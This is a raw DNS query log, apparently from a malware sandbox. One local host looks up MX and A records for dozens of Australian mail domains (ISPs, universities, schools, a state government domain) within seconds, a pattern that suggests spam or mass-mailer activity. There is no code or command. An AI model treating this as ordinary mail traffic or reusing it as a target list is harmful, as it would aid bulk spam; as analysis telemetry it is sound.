                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.204375029 CET8.8.8.8192.168.2.30x95d9No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.204375029 CET8.8.8.8192.168.2.30x95d9No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.204375029 CET8.8.8.8192.168.2.30x95d9No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.204375029 CET8.8.8.8192.168.2.30x95d9No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.204375029 CET8.8.8.8192.168.2.30x95d9No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.204375029 CET8.8.8.8192.168.2.30x95d9No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.204375029 CET8.8.8.8192.168.2.30x95d9No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.223905087 CET8.8.8.8192.168.2.30x8b88No error (0)smtp-in.jcu.edu.au137.219.20.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.240677118 CET8.8.8.8192.168.2.30x2838No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.261552095 CET8.8.8.8192.168.2.30x5703No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.261552095 CET8.8.8.8192.168.2.30x5703No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.360863924 CET8.8.8.8192.168.2.30xe0f6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.360863924 CET8.8.8.8192.168.2.30xe0f6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.360863924 CET8.8.8.8192.168.2.30xe0f6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.386230946 CET8.8.8.8192.168.2.30xf617No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.386230946 CET8.8.8.8192.168.2.30xf617No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.386230946 CET8.8.8.8192.168.2.30xf617No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.386230946 CET8.8.8.8192.168.2.30xf617No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.386230946 CET8.8.8.8192.168.2.30xf617No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.386230946 CET8.8.8.8192.168.2.30xf617No error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.386230946 CET8.8.8.8192.168.2.30xf617No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.386230946 CET8.8.8.8192.168.2.30xf617No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.490664005 CET8.8.8.8192.168.2.30x5187No error (0)icare.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.490664005 CET8.8.8.8192.168.2.30x5187No error (0)icare.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.503779888 CET8.8.8.8192.168.2.30x538fName error (3)smh.edu.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.537903070 CET8.8.8.8192.168.2.30x49f1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.537903070 CET8.8.8.8192.168.2.30x49f1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.537903070 CET8.8.8.8192.168.2.30x49f1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.539350033 CET8.8.8.8192.168.2.30x2f9fNo error (0)icarehealth-com.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.539350033 CET8.8.8.8192.168.2.30x2f9fNo error (0)icarehealth-com.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.557342052 CET8.8.8.8192.168.2.30x443cNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.557342052 CET8.8.8.8192.168.2.30x443cNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.557342052 CET8.8.8.8192.168.2.30x443cNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.557342052 CET8.8.8.8192.168.2.30x443cNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.557342052 CET8.8.8.8192.168.2.30x443cNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.557342052 CET8.8.8.8192.168.2.30x443cNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.557342052 CET8.8.8.8192.168.2.30x443cNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.557342052 CET8.8.8.8192.168.2.30x443cNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.619199038 CET8.8.8.8192.168.2.30x978aNo error (0)three.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.687629938 CET8.8.8.8192.168.2.30xd7eaNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.687629938 CET8.8.8.8192.168.2.30xd7eaNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.687629938 CET8.8.8.8192.168.2.30xd7eaNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.709388018 CET8.8.8.8192.168.2.30x5c1No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.709388018 CET8.8.8.8192.168.2.30x5c1No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.709388018 CET8.8.8.8192.168.2.30x5c1No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.709388018 CET8.8.8.8192.168.2.30x5c1No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.709388018 CET8.8.8.8192.168.2.30x5c1No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.709388018 CET8.8.8.8192.168.2.30x5c1No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.709388018 CET8.8.8.8192.168.2.30x5c1No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.709388018 CET8.8.8.8192.168.2.30x5c1No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.775718927 CET8.8.8.8192.168.2.30x28abNo error (0)tafensw.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.808533907 CET8.8.8.8192.168.2.30x2414No error (0)tafensw-net-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.808533907 CET8.8.8.8192.168.2.30x2414No error (0)tafensw-net-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.881834984 CET8.8.8.8192.168.2.30x3157Name error (3)dialm.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.926244020 CET8.8.8.8192.168.2.30x6e24No error (0)smtpin2.three.com.au202.124.68.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.949390888 CET8.8.8.8192.168.2.30x6d5aNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.969090939 CET8.8.8.8192.168.2.30x5fd0No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.972125053 CET8.8.8.8192.168.2.30x6b2eName error (3)ep.edu.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.085896969 CET8.8.8.8192.168.2.30x1523No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.119273901 CET8.8.8.8192.168.2.30xef7eNo error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.119273901 CET8.8.8.8192.168.2.30xef7eNo error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.177433014 CET8.8.8.8192.168.2.30xd7b4No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.198559046 CET8.8.8.8192.168.2.30xb3aNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.477782011 CET8.8.8.8192.168.2.30xfa01No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.477782011 CET8.8.8.8192.168.2.30xfa01No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.477782011 CET8.8.8.8192.168.2.30xfa01No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.496510029 CET8.8.8.8192.168.2.30xfcc1No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.496510029 CET8.8.8.8192.168.2.30xfcc1No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.496510029 CET8.8.8.8192.168.2.30xfcc1No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.496510029 CET8.8.8.8192.168.2.30xfcc1No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.496510029 CET8.8.8.8192.168.2.30xfcc1No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.496510029 CET8.8.8.8192.168.2.30xfcc1No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.496510029 CET8.8.8.8192.168.2.30xfcc1No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.496510029 CET8.8.8.8192.168.2.30xfcc1No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.605454922 CET8.8.8.8192.168.2.30x64b7No error (0)cgd.vic.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.605454922 CET8.8.8.8192.168.2.30x64b7No error (0)cgd.vic.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.605477095 CET8.8.8.8192.168.2.30x1413No error (0)adam.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.631051064 CET8.8.8.8192.168.2.30xc435No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.675976992 CET8.8.8.8192.168.2.30x933dNo error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.699511051 CET8.8.8.8192.168.2.30x8b1cNo error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.733418941 CET8.8.8.8192.168.2.30xc71eNo error (0)mxa-0070f401.gslb.pphosted.com205.220.182.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.800282001 CET8.8.8.8192.168.2.30xf43cNo error (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.823025942 CET8.8.8.8192.168.2.30x3d5No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.874887943 CET8.8.8.8192.168.2.30x716eName error (3)jaze.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.883132935 CET8.8.8.8192.168.2.30xeb90No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.883132935 CET8.8.8.8192.168.2.30xeb90No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.883132935 CET8.8.8.8192.168.2.30xeb90No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.901654959 CET8.8.8.8192.168.2.30xa086No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.901654959 CET8.8.8.8192.168.2.30xa086No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.901654959 CET8.8.8.8192.168.2.30xa086No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.901654959 CET8.8.8.8192.168.2.30xa086No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.901654959 CET8.8.8.8192.168.2.30xa086No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.901654959 CET8.8.8.8192.168.2.30xa086No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.901654959 CET8.8.8.8192.168.2.30xa086No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.901654959 CET8.8.8.8192.168.2.30xa086No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.070061922 CET8.8.8.8192.168.2.30x5b9bName error (3)stjohnbosco.adl.catholic.edu.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.207947016 CET8.8.8.8192.168.2.30x6b7aName error (3)stmaryscoll.adl.catholic.edu.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.221282959 CET8.8.8.8192.168.2.30x6736No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.239276886 CET8.8.8.8192.168.2.30x12cbNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.321456909 CET8.8.8.8192.168.2.30xd747No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.321456909 CET8.8.8.8192.168.2.30xd747No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.341902971 CET8.8.8.8192.168.2.30x7b97No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.377274036 CET8.8.8.8192.168.2.30x5a93No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.377274036 CET8.8.8.8192.168.2.30x5a93No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.377274036 CET8.8.8.8192.168.2.30x5a93No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.396538019 CET8.8.8.8192.168.2.30xd057No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.396538019 CET8.8.8.8192.168.2.30xd057No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.396538019 CET8.8.8.8192.168.2.30xd057No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.396538019 CET8.8.8.8192.168.2.30xd057No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.396538019 CET8.8.8.8192.168.2.30xd057No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.396538019 CET8.8.8.8192.168.2.30xd057No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.396538019 CET8.8.8.8192.168.2.30xd057No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.396538019 CET8.8.8.8192.168.2.30xd057No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.563338041 CET8.8.8.8192.168.2.30xacc0No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.563338041 CET8.8.8.8192.168.2.30xacc0No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.595000029 CET8.8.8.8192.168.2.30xe1b7No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.657964945 CET8.8.8.8192.168.2.30xe75dNo error (0)student.bond.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.657964945 CET8.8.8.8192.168.2.30xe75dNo error (0)student.bond.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.680629969 CET8.8.8.8192.168.2.30xdc5fNo error (0)mx1.bond.c3s2.iphmx.com68.232.152.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.680629969 CET8.8.8.8192.168.2.30xdc5fNo error (0)mx1.bond.c3s2.iphmx.com68.232.151.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.680629969 CET8.8.8.8192.168.2.30xdc5fNo error (0)mx1.bond.c3s2.iphmx.com68.232.151.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.680629969 CET8.8.8.8192.168.2.30xdc5fNo error (0)mx1.bond.c3s2.iphmx.com68.232.152.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.731986046 CET8.8.8.8192.168.2.30xd4eNo error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.763216972 CET8.8.8.8192.168.2.30xc281No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.763216972 CET8.8.8.8192.168.2.30xc281No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.768748999 CET8.8.8.8192.168.2.30xbb32No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.768748999 CET8.8.8.8192.168.2.30xbb32No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.768748999 CET8.8.8.8192.168.2.30xbb32No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.789899111 CET8.8.8.8192.168.2.30xf304No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.789899111 CET8.8.8.8192.168.2.30xf304No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.789899111 CET8.8.8.8192.168.2.30xf304No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.789899111 CET8.8.8.8192.168.2.30xf304No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.789899111 CET8.8.8.8192.168.2.30xf304No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.789899111 CET8.8.8.8192.168.2.30xf304No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.789899111 CET8.8.8.8192.168.2.30xf304No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.789899111 CET8.8.8.8192.168.2.30xf304No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.811155081 CET8.8.8.8192.168.2.30x70c6No error (0)fatimarosebud.catholic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.811155081 CET8.8.8.8192.168.2.30x70c6No error (0)fatimarosebud.catholic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.811155081 CET8.8.8.8192.168.2.30x70c6No error (0)fatimarosebud.catholic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.811155081 CET8.8.8.8192.168.2.30x70c6No error (0)fatimarosebud.catholic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.811155081 CET8.8.8.8192.168.2.30x70c6No error (0)fatimarosebud.catholic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.847228050 CET8.8.8.8192.168.2.30x6161No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.847228050 CET8.8.8.8192.168.2.30x6161No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.847228050 CET8.8.8.8192.168.2.30x6161No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.852963924 CET8.8.8.8192.168.2.30xab60No error (0)aspmx.l.google.com108.177.119.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.867768049 CET8.8.8.8192.168.2.30x88f5No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.867768049 CET8.8.8.8192.168.2.30x88f5No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.867768049 CET8.8.8.8192.168.2.30x88f5No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.867768049 CET8.8.8.8192.168.2.30x88f5No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.867768049 CET8.8.8.8192.168.2.30x88f5No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.867768049 CET8.8.8.8192.168.2.30x88f5No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.867768049 CET8.8.8.8192.168.2.30x88f5No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.867768049 CET8.8.8.8192.168.2.30x88f5No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.895719051 CET8.8.8.8192.168.2.30x44f4No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.895719051 CET8.8.8.8192.168.2.30x44f4No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.920222998 CET8.8.8.8192.168.2.30x8db8No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.990381956 CET8.8.8.8192.168.2.30x12c3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
